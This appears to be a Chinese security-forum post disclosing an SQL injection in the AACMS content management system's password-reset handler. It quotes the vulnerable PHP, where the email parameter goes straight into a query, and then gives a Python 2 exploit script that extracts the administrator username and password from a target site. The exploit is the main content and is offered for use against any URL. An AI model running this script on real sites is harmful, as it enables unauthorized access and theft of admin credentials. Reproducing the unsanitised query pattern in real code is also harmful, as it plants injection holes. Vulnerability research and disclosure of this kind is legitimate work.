By:Cond0r

    第一次挖漏洞,找了个小点得,大牛勿喷

user.action.php 文本第98行:

elseif ($act=='repassword') {       
       
        $uid = $db->getOne("SELECT uid FROM $_SC[tablepre]members WHERE email='$_REQUEST[email]'"); //明显的。。。
       
        if($uid){
                echo $uid;
                $password = random(6);
               
                $smtpemailto = $_REQUEST['email'];
                $mailsubject = '找出密码 - AACMS';
                $mailbody = '您的密码为:' . $password .' <br/>本邮件为系统自动所发,请勿回复!';
                include(S_ROOT . 'include/send_mail.php');
               
                $db->update("$_SC[tablepre]members",array( 'password' => md5($password) ),'uid='.$uid);
               
                echo '邮箱发送成功,请查收!';
               

        }else{
                echo '邮箱未被使用!';
        }
}

    py写的exp..需要 <=py2.7环境。。

以下是引用片段:

#/usr/bin/python
import sqlerror
from sys import argv
sql=sqlerror.errorinj()
try:
    site=argv[1]
   
    url=site+"/user.action.php?act=repassword&email="
    database=sql.getdatabase(url)
    table=["username","password"]
    for t in table:
        sql.strgetdata(url,"cms_admins",t,database)
       
except:
    print "Usage: "+argv[0]+" http://127.0.0.1/"
    print "Usage: "+argv[0]+" http://127.0.0.1/aacms"
'''
url=site+"/user.action.php?act=repassword&email="
print url
database=sql.strgetdatabase(url)
table=["username","password"]
for t in table:
    sql.strgetdata(url,"cms_admins",t,database)  
'''

    http://t00ls.net/thread-18866-1-1.html